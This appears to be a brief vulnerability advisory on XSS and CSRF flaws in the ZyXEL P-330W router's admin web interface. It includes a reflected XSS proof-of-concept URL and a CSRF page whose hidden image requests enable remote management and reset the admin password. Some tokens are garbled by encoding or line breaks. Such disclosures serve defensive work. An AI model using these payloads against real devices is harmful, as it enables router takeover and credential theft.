Exploit Code
source: http://www.securityfocus.com/bid/27024/info ZyXEL P-330W 802.11g Secure Wireless Internet Sharing Router is prone to multiple cross-site scripting vulnerabilities and cross-site request-forgery vulnerabilities because it fails to properly sanitize user-supplied input. These issues affect the device's web-based administrative interface. An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The attacker may leverage the cross-site request-forgery issues to perform actions in the context of a device administrator, which can compromise the device. http://www.example.com:<router_port>/ping.asp?pingstr=â?><script>alert("M erry Christams")</script> The following cross-site request-forgery example was provided: <html><head><title>Chirstmastime is Here</title></head><body> <img src="http://www.example.com:<router_port>/goform/formRmtMgt?webWanAccess =ON&remoteMgtPort=80 80&pingWANEnabled=&upnpEnabled=&WANPassThru1=&WANPassThru2=&WANPassT hru3=& submit-url=%2Fremotemgt.asp" width="0" height="0"> <img src="http://www.example.com:<router_port>/goform/formPasswordSetup?usern ame=admin&newpass=santa_pw &confpass=santa_pw&submit-url=%2Fstatus.asp&save=Save" width="0" height="0"> </body> </html>